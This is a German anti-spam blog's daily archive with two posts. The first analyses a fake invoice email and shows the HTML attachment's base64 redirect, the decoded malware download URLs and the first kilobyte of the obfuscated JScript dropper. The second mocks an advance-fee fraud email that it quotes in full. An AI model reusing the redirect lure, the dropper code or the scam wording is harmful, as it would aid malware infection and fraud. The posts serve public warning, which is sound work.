Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Tagesarchiv für den 30. September 2022

Ihre Rechnung 146648577349 von der Böttcher AG

Freitag, 30. September 2022

⚠️ Warnung, Schadsoftware! Auf gar keinen Fall den Anhang klicken! ⚠️

Von: Böttcher AG <no-reply@glenat.com>
An: undisclosed-recipients: ;

So so, eine Rechnung, die an ganz viele Empfänger auf einmal geht. 😂️

Natürlich kommt diese Spam nicht von der Böttcher AG, sondern von schwerkriminellen Spammern, die Rechner anderer Leute mit Schadsoftware übernehmen wollen. Bevorzugt kleine und mittelständische Unternehmen. Denen droht dann oft die Insolvenz, und dann werden Erpresser halt bezahlt. 😕️

Ihre Rechnungsnummer: 146648577349
Ihre Kundennummer: 646756981732962

Lieber Kunde,

Hach, so viele schöne Zahlen, aber der einzige Name, den ich habe, ist „Lieber Kunde“. Die scheinen ihre Kunden aber nicht zu mögen. 😁️

beiliegend erhalten Sie Ihre Rechnung als HTML-Dokument.

Ah ja! Da ist ja tatsächlich ein Anhang dran. Da steht aber nicht so viel drin. Der ist nur eine Weiterleitung zu einer base64-codierten URL. Na gut, fange ich mal an – wie üblich arbeite ich mit meiner Kommadozeile unter Linux:

$ cat Rechnung-b-a_0000003198.html 
<body id="kqisC2MKfeohSuvlhlQyUmZZdlUGTxyDYNrBPoW05qdsUurHk2yYsHp4DgvqGBSbC5Aut1qSVdJDugOkeNeshVsoPBGnbKJ3UCLXYnFs4Bu" onpageshow="document.location.href=window.atob('aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M=');">
$ echo aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M= | base64 -d; echo 
https://3t8.at/apD8qloS
$ mime-header https://3t8.at/apD8qloS | grep -i ^location
location: https://info-opensocial.googleusercontent.com/gadgets/ifr?url=https://hatcherlawgroup.com/img/inf/inf
$ _

Ab jetzt geht es nur noch mit einem richtigen Browser weiter, weil zum Zugriff auf die gängelnde und gefährliche Google-Cloud leider Javascript benötigt wird. Ja, dieser hochgefährliche Sondermüll wird anonym und kostenlos in der Cloud eines Google-Kontos gehostet. Ist es nicht „schön“, wie einfach das alles geworden ist? Hier ist längst ein Paradies für Kriminelle entstanden. Ich habe mir mal den Spaß gemacht und in einer virtuellen Maschine den Download gemacht. Die Datei ist ein ZIP-Archiv, das es in sich hat:

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 96K Sep 30 15:21 5640955135.zip
$ zip -sf 5640955135.zip 
Archive contains:
  xi1132111.js
Total 1 entries (418953 bytes)
$ unzip 5640955135.zip 
Archive:  5640955135.zip
  inflating: xi1132111.js  
$ _

Dettelbach ist überall! 😱️

Diese Datei ist kein Dokument, sondern Programmcode, der nach klicki-klicki Doppelklick vom Windows Script Host ausgeführt wird. Dieser Programmcode ist ausgesprochen kryptisch formuliert und…

$ wc xi1132111.js 
     2    373 418953 xi1132111.js
$ _

…steht in lediglich zwei Zeilen, die aber insgesamt rd. 420 Kilobyte Javascript-Programmcode enthalten. 😮️

Um einen Eindruck davon zu vermitteln, wie vorsätzlich schwierig analyisierbar und kryptisch dieses Programm gecodet ist, gebe ich hier mal das erste Kilobyte aus und füge nach jedem Komma einen Zeilenumbruch ein, damit man es noch bequem lesen kann:

$ dd status=none if=xi1132111.js bs=1024 count=1 | sed 's/,/,\n/g'; echo 
function _0×3cd5(){var _0×11cf11=['\x2f\x67\x2c\x66\x5b\x31\x46\x5d\x29\x29\x3b\x31\x67\x3d',
'\x6a\x70\x66\x57\x51',
'\x79\x5c\x5a\x22\x2c\x22\x5c\x6a\x5c\x6d\x22\x2c\x22\x5c',
'\x56\x6b\x72\x7a\x62',
'\x5c\x6b\x22\x2c\x22\x5c\x74\x5c\x31\x62\x22\x2c\x22\x5c',
'\x4f\x6f\x4d\x6c\x57',
'\x4d\x41\x58\x41\x73',
'\x5c\x63\x5c\x68\x5c\x73\x5c\x63\x5c\x59\x5c\x63\x5c\x63',
'\x75\x5d\x2b\x66\x5b\x31\x76\x5d\x2b\x66\x5b\x31\x6d\x5d',
'\x61\x5c\x62\x5c\x62\x5c\x61\x5c\x62\x5c\x53\x5c\x4a\x5c',
'\x6a\x61\x61\x67\x70',
'\x7c\x7a\x6d\x42\x45\x6f\x52\x53\x64\x7c\x78\x34\x42\x7c',
'\x61\x77\x6e\x6c\x69',
'\x49\x65\x52\x45\x67',
'\x5c\x73\x5c\x63\x5c\x43\x5c\x63\x5c\x70\x5c\x61\x5c\x69',
'\x72\x4d\x79\x54\x48',
'\x49\x6d\x77\x47\x67',
'\x42\x69\x74\x77\x49',
'\x5c\x75\x5c\x6e\x5c\x6d\x5c\x72\x5c\x61\x5c\x64\x5c\x6b',
'\x77\x7a\x77\x47\x71',
'\x61\x5c\x62\x22\x2c\x22\x5c\x65\x5c\x61\x5c\x62\x5c\x64',
'\x5c\x6b\x22\x2c\x22\x5c\x6a\x5c\x55\x5c\x70\x5c\x61\x5c',
'\x5c\x2b\x5c\x2b\x20\x2a\x28\x3f\x3a\x5b\x61\x2d\x7a\x41',
'\x5c\x6f\x5c\x78\x5c\x63\x5c
$ _

Von einem neuronalen Netzwerk generiertes Bild einer verlassenen industriellen Anlage, die überall mit Blut verschmiert istSo etwas führt man doch gern auf seinem Computer aus, gelle? Vor allem, wenn es aus einer fragwürdigen Mail kommt, die von einer Rechnung faselt, aber nicht einmal eine persönliche Ansprache beinhaltet. Natürlich sollte man solchen Code nicht ausführen, auch nicht, wenn man dafür nur eine Datei doppelklicken muss. Man sollte generell E-Mail nur mit der Kneifzange anfassen. E-Mail ist sehr praktisch, das aber leider auch für Kriminelle. Wer niemals einen Anhang öffnet, der nicht vorher über ein anderes Medium als E-Mail explizit abgesprochen wurde, tut viel für seine Computersicherheit. 🛡️

Es wird sich mit an Sicherheit grenzender Wahrscheinlichkeit um Schadsoftware handeln. Diese Schadsoftware ist die neueste Brut der Kriminellen, sie wird im Moment nur von einem sehr kleinen Bruchteil der Antivirus-Programme erkannt. Zur Verdeutlichung habe ich auch einen Screenshot von VirusTotal von heute, 15:54 Uhr gemacht, weil ich hoffe, dass sich die Erkennungsrate schon in den nächsten Stunden deutlich verbessert. Das gesamte Antivirus-Schlangenöl wird also einmal mehr nicht helfen. 💀️

Vermutlich sind jetzt bereits die Netzwerke von hunderten bis tausenden Betrieben von Kriminellen übernommen worden, und in Kürze werden überall die Erpressungstrojaner Geld einfordern. Das wird Kosten verursachen und vielleicht sogar die eine oder andere Insolvenz zur Folge haben. 😵️

Auf eine Abuse-Meldung bei Google habe ich verzichtet. Ich bin nicht so ein Freund kafkaesker Erfahrungen. Stattdessen habe ich die giftige Mail an das Landeskriminalamt Niedersachsen weitergeleitet. 👮‍♂️️

Sobald Ihre Ware (Lagerware) unser Logistikzentrum verlassen hat, erhalten Sie per E-Mail eine Versandbenachrichtigung mit Link zur Sendungsverfolgung.

Den Status Ihrer Bestellung können Sie jederzeit in unserem Onlineshop www.bueromarkt-ag.de unter Mein Konto – Meine Bestellungen einsehen.
Fehlende Artikel werden automatisch nachgeliefert.

Wenn Sie einen Artikel zurücksenden möchten, nutzen Sie bitte unsere Online-Rückgabe unter Mein Konto – Rücksendung & Reklamation.

Für Rückfragen stehen wir Ihnen gern zur Verfügung.
Vielen Dank für Ihren Auftrag.

Bitte antworten Sie nicht auf diese Nachricht, da sie automatisch von einem Postfach generiert wurde, welches keine eingehenden e-Mails empfangen kann.

Mit freundlichen Grüßen

⚠️ Bitte auf gar keinen Fall darauf reinfallen! ⚠️

vertrauliche Informationen

Freitag, 30. September 2022

In einer unverschlüsselten E-Mail, die offen wie eine Postkarte durch das Internet befördert wird? 🤭️

Von: vertrauliche Informationen /<marvin.aquino.jalapa@pgn.gob.gt>
Antwort an: jonathonsher@yahoo.com <jonathonsher@yahoo.com>
An: undisclosed-recipients: ;

Die Spam wurde übrigens von einer IP-Adresse aus Guatemala versandt, einem recht seltenen Gast im Spameingang. Kann ich verstehen, dass der angebliche Kanadier sich lieber in Mittelamerika aufhält, da ist das Wetter doch deutlich angenehmer. 🌄️

Aber trotzdem: Es ist die übliche Dreieinigkeit des Vorschussbetruges: Der Absender ist gefälscht, die Antwort geht an eine kostenlos und anonym eingerichtete Freemail-Adresse (zur Abwechslung mal nicht bei Google) und die Mail geht an ganz viele Empfänger auf einmal, ist also so persönlich wie ein Reklamezettel im Briefkasten. Mehr muss man nicht wissen, um den Müll zu löschen. 🗑️

Außer, man möchte noch mal herzlich über eine hanebüchene Geschichte zur Einleitung eines Vorschussbetrugs lachen. 😄️

Hallo, Ich bin Jonathan Sherman. Ich bin der Sohn eines kanadischen Builloniers. Ich möchte ein Haus in Ihrem Land kaufen, wo ich mit meiner Familie umziehen kann. Wenn Sie so freundlich wären, mir zu helfen, jemanden in Ihrer Nähe zu finden, bin ich bereit, 40 % meines Erbes mit Ihnen zu teilen. Goldgeld auf der Bank einzahlen und vieles mehr. Dies ist nur eine Einführung in das, was ich gerne mit Ihnen besprechen möchte. Wären Sie so freundlich, mich für weitere Einzelheiten zu kontaktieren? Das ist vertraulich, ich wollte es nie öffentlich machen. Aus diesem Grund muss ich Ihre E-Mail persönlich ansprechen. Bitte kontaktieren Sie mich für weitere Details. Ich verspreche, ich werde nicht viel von Ihrer Zeit in Anspruch nehmen. Ich brauchte nur jemanden, dem ich meinen vertraulichen Umzugsplan anvertrauen konnte. wenn Sie so freundlich wären, sich an meine private E-Mail-Adresse zu wenden: Ich werde Ihnen alle Einzelheiten des Grundes für meinen Umzug mitteilen. private E-Mail: JonathonSherman@outlook.com Privates WhatsApp: +1(289)645■■■■ Mit freundlichen Grüßen, Jonathan Shermann.

Von einem neuronalen Netzwerk generiertes Bild eines Mannes mit vielen Banknoten im HintergrundHallo! 👋️

Ich habe keine verdammte Ahnung, wie du heißt oder wer du bist, aber ich kenne immerhin meinen eigenen Namen. Den kennt ja auch nicht jeder. Ich bin Jonathan, Sohn eines kanadischen Billionärs. Wie man „Billionär“ schreibt und welchen Zweck Absätze in einem Text haben, hatte ich leider noch nicht an der Schule. 😶️

Aber ich habe schon eine Familie, und mit der möchte ich umziehen. In dein Land, bei dem ich lieber nicht erwähne, wie es heißt, denn diese Spam geht völlig wahllos (und öfter von einem Computer übersetzt) an ganz viele Empfänger aus diversen Ländern. Um dort auch wohnen zu können und mich nicht unter der Brücke zusammen mit den politisch gewünschten Totalverarmten in der Bundesrepublik drängeln zu müssen, möchte ich ein Haus kaufen. Weil ich auch noch nicht an der Schule gelernt habe, wie das mit dem Kaufen geht, guck doch mal, ob jemand in deiner Umgebung das weiß oder ob du einen Makler in deiner Stadt hast. 🏡️

Komm, das glaubst du mir doch! Dass ich einfach wahllos irgendwelche Leute anmaile, weil sie so eine schöne Mailadresse mit Gammelfleisch im Namensteil haben, statt einfach in einem Branchenverzeichnis einen Makler rauszusuchen, der mir ein schönes Haus verkauft. Der ist zwar auch eine Fäkalmade und hat keine Hemmungen, eine höchst asoziale Wucher-Courtage zu nehmen, aber ich muss ihm nicht vierzig Prozent meines Billionärs-Erbes nebst einer Kollektion meiner schönsten Goldbarren anbieten. 👍️

Von einem neuronalen Netzwerk generiertes Bild einer Tafel mit undefinierbaren SchriftzeichenMeine wirre Mail aus der Klapsmühle ist auch nur eine Einführung in das, was ich mit dir noch besprechen will. Komm, du bist auch doch ganz heiß darauf, mehr wirre und irre Geschichten vom schlechten Erzähler zu hören! Also antworte mir einfach! Aber natürlich nicht an die Absenderadresse, die ist gefälscht. Und trotzdem ganz feste daran glauben, dass das mit dem Riesenhaufen Geld stimmt. Das muss alles übrigens voll geheim bleiben, ich will nicht, dass mein Psychiater davon erfährt. Also betrachte meine ganz geheimen Geheimpläne für meinen Geheimumzug als Geheimgeheimnis und rede mit niemanden darüber! Deshalb schreibe ich meine Geschichten zur Einleitung eines Vorschussbetruges ja auch auf Postkarten und benutze keine Verschlüsselung. 🔓️

Gut: In Wirklichkeit weiß ich, dass jemand, der seine E-Mail verschlüsselt, schon zu intelligent sein wird, um auf meinen plumpen Betrug reinzufallen. Und außerdem könnte ich nicht so einfach meine Massenpost machen, sondern müsste jede einzelne meiner hunderttausenden von Spams individuell für den Empfänger verschlüsseln. Da würde mein gesamtes Geschäft als Vorschussbetrüger zusammenbrechen. Da müsste ich ja richtig arbeiten und mir Mühe geben. Wenn ich das wollte, brauchte ich doch nicht zu spammen. 🛠️

Wenn du so enddumm bist, mir zu antworten, verspreche ich dir, dass ich und meine Bande sich stundenlang mit dir beschäftigen werden. Wir quasseln dich dumm, bis wir dein Gehirn einfach auslöffeln können. Du hast ja gezeigt, dass man dir leicht irgendwelche wirren Geschichten glaubwürdig machen kann, und das werden wir schonungslos ausnutzen und dich ausnehmen wie eine Weihnachtsgans. Du hast immer ganz viel Geld vor Augen…

Eine alte Karikatur, die den auf einem Esel reitenden Tod zeigt, der dem Esel mit einer Angelleine eine Karotte vor Augen hält, damit er weiter geht. Der Esel rennt gierig auf den Abgrund zu.
Bild: Wikimedia Commons, Lizenz: Public Domain

Von einem neuronalen Netzwerk generiertes Bild von Banknoten in einem Koffer…und bezahlst eine Vorleistung nach der anderen, weil wir die bescheuersten Methoden zum Geldtransfer benutzen, die in unserer Fantasie so aufgesprossen sind. Wir schicken dir keinen Scheck in einem versicherten Brief, den du einfach bei deiner Bank einreichen könntest, wir haben spezielle Spezialverfahren, bei denen ganz viele Vorleistungen fällig werden, fünfzigmal übler als noch die abzockerischsten Bankgebühren. Da wird dann hier eine Gebühr fällig und dort noch eine Gebühr fällig, und dann noch einmal eine teure notarielle Beglaubigung zur Erklärung gemäß Geldwäschegesetz von Fantastistan, und natürlich eine obskure Gebühr für einen Treuhänder, der das Geld bar in einer Schatzkiste neben seinem Bett vorhält. Und natürlich noch eine Bestechung für einen korrupten Beamten, die darf ja auch nicht fehlen. 💸️

Und das musst alles du bezahlen, weil ich, Jonathan der Billionärssohn, gerade kein Kleingeld in der Tasche habe. Und natürlich habe ich auch kein Bankkonto, so dass es am besten ist, wenn du einfach, schnell und anonymisierend über Western Union und Konsorten bezahlst. Mit dem Geld kaufen wir dann Kokain und Autos und gehen in den Puff. Ist doch viel angenehmer, wenn wir dein Geld verprassen, statt arbeiten zu gehen. 😊️

Die Story von Jonathan ist nichts als Lüge. 🤥️

Bitte auf gar keinen Fall an die Absenderadresse antworten. Die ist gelogen. Und wenn du leichtgläubig bist, aber Probleme mit dem Schreiben hast, gibt es auch eine WanzApp-Nummer für dich. Reden musst du schon noch können. Das muss auch nicht unbedingt strukturiert, zusammenhängend oder nachvollziehbar sein, was du redest, hauptsache du hast genug Geld, dass es sich lohnt, dich auszunehmen. Deshalb machen wir auch WanzApp. 📞️

Ich will schließlich keinen Idioten davon ausschließen, zum Opfer eines Vorschussbetruges zu werden, denn ich lebe vom Betrug. 💩️

Mit Winkewinke
Dein Jonathan mit angeflanschtem Geldsack